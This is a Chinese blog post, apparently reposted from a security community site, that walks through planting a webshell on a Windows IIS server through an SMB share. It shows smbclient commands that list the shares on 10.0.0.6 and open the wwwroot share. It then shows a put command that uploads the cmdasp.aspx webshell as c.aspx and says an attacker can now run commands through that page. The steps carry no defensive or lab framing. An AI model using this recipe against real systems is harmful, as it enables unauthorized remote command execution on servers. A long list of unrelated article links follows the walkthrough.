当前位置: 首页 > news >正文

通过共享目录上传后门

news 来源:原创 2024/9/21 12:39:20

本文来自无问社区,更多实战内容可前往查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/13337.html

操作步骤

枚举目标主机开启的共享服务信息:10.0.0.6

smbclient -L //10.0.0.6 -U spotWARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password: Sharename       Type      Comment---------       ----      -------ADMIN$          Disk      Remote AdminC$              Disk      Default shareCertEnroll      Disk      Active Directory Certificate Services shareIPC$            IPC       Remote IPCNETLOGON        Disk      Logon server share SYSVOL          Disk      Logon server share temp            Disk      tools           Disk      transcripts     Disk      wwwroot         Disk

登录共享:wwwroot

smbclient //10.0.0.6/wwwroot -U spotWARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password: 
Try "help" to get a list of possible commands.
smb: \> ls.                                   D        0  Sat Aug 25 16:57:52 2018..                                  D        0  Sat Aug 25 16:57:52 2018aspnet_client                       D        0  Tue Jul 31 20:11:20 2018iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018

将 webshell 上传到 :wwwroot

put /usr/share/webshells/aspx/cmdasp.aspx c.aspxputting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
smb: \> ls.                                   D        0  Sat Aug 25 16:59:47 2018..                                  D        0  Sat Aug 25 16:59:47 2018aspnet_client                       D        0  Tue Jul 31 20:11:20 2018c.aspx                              A     1400  Sat Aug 25 16:59:47 2018iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018iisstart.htm                        A        3  Tue Jul 31 19:38:23 20186463487 blocks of size 4096. 3032260 blocks available

与上图相同:

图片

攻击者现在可以通过以下方式访问新上传的 webshell 并开始执行命令:http://10.0.0.6/c.aspx.

图片

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 学习Flutter时需要了解的背景知识
  • 实现将docx转成PDF
  • django中的MESSAGE组件
  • 支持S/MIME证书的邮件客户端有哪些?
  • 【Java学习】Stream流详解
  • 短视频SDK解决方案,降低行业开发门槛
  • pytorch实现单层线性回归模型
  • 探索工业互联网智能赋能智能制造算法综述
  • 工程数学线性代数(同济大学数学系)第六版(更新中)
  • 2024 年的 Node.js 生态系统
  • 输出倒闭输入
  • Android Studio报错 Failed to transform ‘...‘ using Jetifier. Reason null
  • 学生阅读行为与图书预定平台的设计与实现(全网独一无二,24年最新定做)
  • Qt 字符串类应用
  • 代码随想录算法训练营第二天 | 滑动窗口 + 螺旋矩阵
  • 《Javascript数据结构和算法》笔记-「字典和散列表」
  • Apache Spark Streaming 使用实例
  • ES6之路之模块详解
  • HTTP请求重发
  • Mithril.js 入门介绍
  • Python_网络编程
  • Python实现BT种子转化为磁力链接【实战】
  • SpringBoot 实战 (三) | 配置文件详解
  • Vue UI框架库开发介绍
  • 工程优化暨babel升级小记
  • 基于阿里云移动推送的移动应用推送模式最佳实践
  • 离散点最小(凸)包围边界查找
  • 排序(1):冒泡排序
  • 浅谈Kotlin实战篇之自定义View图片圆角简单应用(一)
  • 如何邀请好友注册您的网站(模拟百度网盘)
  • 微服务核心架构梳理
  • 微信开放平台全网发布【失败】的几点排查方法
  • ​RecSys 2022 | 面向人岗匹配的双向选择偏好建模
  • #《AI中文版》V3 第 1 章 概述
  • #php的pecl工具#
  • #我与Java虚拟机的故事#连载18:JAVA成长之路
  • #我与Java虚拟机的故事#连载19:等我技术变强了,我会去看你的 ​
  • (Demo分享)利用原生JavaScript-随机数-实现做一个烟花案例
  • (function(){})()的分步解析
  • (Matlab)遗传算法优化的BP神经网络实现回归预测
  • (二)linux使用docker容器运行mysql
  • (附源码)apringboot计算机专业大学生就业指南 毕业设计061355
  • (简单有案例)前端实现主题切换、动态换肤的两种简单方式
  • (使用vite搭建vue3项目(vite + vue3 + vue router + pinia + element plus))
  • (四)库存超卖案例实战——优化redis分布式锁
  • (一)ClickHouse 中的 `MaterializedMySQL` 数据库引擎的使用方法、设置、特性和限制。
  • (一)使用IDEA创建Maven项目和Maven使用入门(配图详解)
  • (转)fock函数详解
  • (转)memcache、redis缓存
  • (转)为C# Windows服务添加安装程序
  • . Flume面试题
  • .gitignore文件_Git:.gitignore
  • .gitignore文件忽略的内容不生效问题解决
  • .NET 6 Mysql Canal (CDC 增量同步,捕获变更数据) 案例版
  • .NET/C# 使用 ConditionalWeakTable 附加字段(CLR 版本的附加属性,也可用用来当作弱引用字典 WeakDictionary)